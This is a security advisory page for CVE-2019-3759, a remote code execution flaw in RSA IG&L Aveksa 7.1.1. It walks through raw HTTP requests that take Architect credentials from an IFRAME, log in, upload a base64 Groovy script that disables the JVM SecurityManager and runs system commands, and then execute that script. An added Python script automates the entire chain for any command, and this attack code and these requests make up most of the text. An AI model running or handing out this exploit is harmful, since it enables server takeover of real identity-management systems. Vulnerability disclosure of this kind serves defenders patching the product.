RSA IG+L Aveksa 7.1.1 Remote Code Execution

2020.07.07
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 5.5/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

# Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution
# Date: 2019-04-16
# Exploit Author: Jakub Palaczynski, Lukasz Plonka
# Vendor Homepage: https://www.rsa.com/
# Version: 7.1.1, prior to P02
# CVE : CVE-2019-3759
# (all vulnerable versions can be found at https://www.dell.com/support/security/pl-pl/details/DOC-106943/DSA-2019-134-RSA-Identity-Governance-and-Lifecycle-Product-Security-Update-for-Multiple-Vulnerabi)

Information:

Authenticated users can bypass authorization and gain full access to the Workpoint Architect module. This module allows Groovy scripts to be created and executed on the server, which results in code execution.

1. First, the user needs to learn the username and password for Architect (these are different from the Aveksa login credentials).

Sample request:

https://AVEKSA_HOST/aveksa/main?Oid=193783&ReqType=GetPartial&PageID=ChangeRequestJobPageData&WFObjectID=1%3AWPDS&crID=193783&isAjax=false

Search for "<IFRAME" in the HTML source of the response and note the username and password.

2. Log into Architect.

Sample request:

POST /aveksaWFArchitect/auth/login/ HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 146
Cookie: JSESSIONID=session
Connection: close

{"user":"USERNAME","password":"PASSWORD","dsn":"WPDS","product":{"name":"wp-architect","version":"4.40.16"}}

3. Create a new script that bypasses the Java Security Policy and runs the "id" system command.

* "statementText" - contains the base64-encoded Groovy code. The value used below decodes to:
      System.setSecurityManager(null);
      'id'.execute().text
  i.e. the script first removes the JVM SecurityManager (which is what enforces the Java Security Policy), then runs "id" through Groovy's String.execute() and returns its standard output.
* "name" (at the end) - the script name, which must be unique.
* Save "scriptId" from the response, as it is required for the next request.

POST /aveksaWFArchitect/scripts/?refresh=true&replace=false&checkSyntax=false&saveWithRollbackVersion=false HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 733
Cookie: JSESSIONID=session
Connection: close

{"statements":[{"scriptLineId":"-26:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"sequence":1,"scriptClassId":17,"sourceName":"LOCAL","scriptId":"","name":"","validationStatus":0,"validationStatusMsg":"","statement":{"statementText":"U3lzdGVtLnNldFNlY3VyaXR5TWFuYWdlcihudWxsKTsKJ2lkJy5leGVjdXRlKCkudGV4dA==","statementJava":{"javaClass":"","ejb":false,"ejbVersion":"","jndiName":"","method":"","methodIsStatic":false,"returns":{"location":"system","name":""},"useInstance":false,"useInstanceObjectName":"","action":"insert"}}}],"scriptId":"-27:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"name":"SCRIPTNAME","scriptTypeId":3,"validationStatus":0,"falseMsg":"","description":"","emitEvents":false,"errorText":"","saveMethod":"Architect"}

4. Run the created script.

* The response contains the result of your command.

PUT /aveksaWFArchitect/scripts/execute/ HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 58
Cookie: JSESSIONID=session
Connection: close

{"id":"SCRIPTID_OF_CREATED_SCRIPT","newTransaction":false,"symbolTable":{}}
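The four steps above, scripted end to end, as an added example; this is not the advisory authors' code and not part of the original page. It assumes a hypothetical AVEKSA_HOST and JSESSIONID, assumes (the advisory does not say) that the IFRAME's src URL carries the Architect credentials as `user` and `password` query parameters, and assumes the step 3 response is JSON with a top-level `scriptId`. The request paths, headers, body fields and the Groovy payload are taken verbatim from the PoC; `groovy_payload("id")` reproduces the exact base64 value used in step 3. Only the offline helpers (payload encoding, IFRAME parsing, request bodies) run by default; `run_chain()` is what you would call against a lab host.

```python
import base64
import json
import re
import ssl
import urllib.request
from urllib.parse import parse_qs, urlparse

# Headers every Architect request in the PoC carries.
ARCHITECT_HEADERS = {
    "User-Agent": "python",
    "wp-product-name": "wp-architect",
    "Content-Type": "application/json",
    "X-Requested-With": "XMLHttpRequest",
}

# Matches the src attribute of any <IFRAME> (step 1 says to search for "<IFRAME").
IFRAME_SRC = re.compile(r'<IFRAME\b[^>]*?\bsrc\s*=\s*["\']([^"\']+)["\']', re.I | re.S)


def groovy_payload(command: str) -> str:
    """Base64 'statementText' for a Groovy script that first drops the JVM
    SecurityManager (the Java Security Policy bypass) and then runs `command`,
    returning its stdout. For "id" this equals the value in the PoC request."""
    escaped = command.replace("\\", "\\\\").replace("'", "\\'")
    groovy = f"System.setSecurityManager(null);\n'{escaped}'.execute().text"
    return base64.b64encode(groovy.encode()).decode()


def architect_credentials(html: str):
    """Step 1: pull the Architect username/password out of the IFRAME embedded
    in the ChangeRequestJob page. ASSUMPTION: the advisory only says they are in
    the IFRAME; the `user`/`password` query parameter names are guessed here."""
    for src in IFRAME_SRC.findall(html):
        qs = parse_qs(urlparse(src.replace("&amp;", "&")).query)
        if "user" in qs and "password" in qs:
            return qs["user"][0], qs["password"][0]
    return None


def login_body(user: str, password: str, dsn: str = "WPDS") -> dict:
    """Step 2 body for POST /aveksaWFArchitect/auth/login/ (fields from the PoC)."""
    return {"user": user, "password": password, "dsn": dsn,
            "product": {"name": "wp-architect", "version": "4.40.16"}}


def create_script_body(name: str, command: str) -> dict:
    """Step 3 body for POST /aveksaWFArchitect/scripts/; mirrors the PoC JSON
    with the command substituted. `name` must be unique on the target."""
    return {
        "statements": [{
            "scriptLineId": "-26:AUTOGEN", "action": "insert", "luDate": None,
            "luId": "", "rowVersion": 0, "sequence": 1, "scriptClassId": 17,
            "sourceName": "LOCAL", "scriptId": "", "name": "",
            "validationStatus": 0, "validationStatusMsg": "",
            "statement": {
                "statementText": groovy_payload(command),
                "statementJava": {
                    "javaClass": "", "ejb": False, "ejbVersion": "", "jndiName": "",
                    "method": "", "methodIsStatic": False,
                    "returns": {"location": "system", "name": ""},
                    "useInstance": False, "useInstanceObjectName": "",
                    "action": "insert"}}}],
        "scriptId": "-27:AUTOGEN", "action": "insert", "luDate": None, "luId": "",
        "rowVersion": 0, "name": name, "scriptTypeId": 3, "validationStatus": 0,
        "falseMsg": "", "description": "", "emitEvents": False, "errorText": "",
        "saveMethod": "Architect",
    }


def execute_body(script_id: str) -> dict:
    """Step 4 body for PUT /aveksaWFArchitect/scripts/execute/."""
    return {"id": script_id, "newTransaction": False, "symbolTable": {}}


def _send(base: str, method: str, path: str, body: dict, jsessionid: str, query: str = ""):
    """One JSON request with the PoC's headers and the Aveksa session cookie."""
    req = urllib.request.Request(base + path + query, method=method,
                                 data=json.dumps(body).encode())
    for key, value in ARCHITECT_HEADERS.items():
        req.add_header(key, value)
    req.add_header("Cookie", f"JSESSIONID={jsessionid}")
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # lab hosts usually present self-signed certs
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, context=ctx) as resp:
        return json.loads(resp.read())


def run_chain(base: str, jsessionid: str, user: str, password: str,
              command: str = "id", name: str = "poc1"):
    """Steps 2-4 end to end against e.g. base="https://AVEKSA_HOST".
    ASSUMPTION: the step 3 response is JSON with a top-level 'scriptId'."""
    _send(base, "POST", "/aveksaWFArchitect/auth/login/", login_body(user, password), jsessionid)
    created = _send(base, "POST", "/aveksaWFArchitect/scripts/", create_script_body(name, command),
                    jsessionid, "?refresh=true&replace=false&checkSyntax=false&saveWithRollbackVersion=false")
    return _send(base, "PUT", "/aveksaWFArchitect/scripts/execute/",
                 execute_body(created["scriptId"]), jsessionid)
```

Step 1 is left as a separate helper because the advisory's first request is an ordinary authenticated Aveksa page fetch, not an Architect call: fetch it with the JSESSIONID cookie, pass the HTML to `architect_credentials()`, and feed the result into `run_chain()`. Note that `urllib` normalizes header names to capitalized form (`Wp-product-name`); HTTP header names are case-insensitive, so this does not change the request semantics.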


Copyright 2020, cxsecurity.com
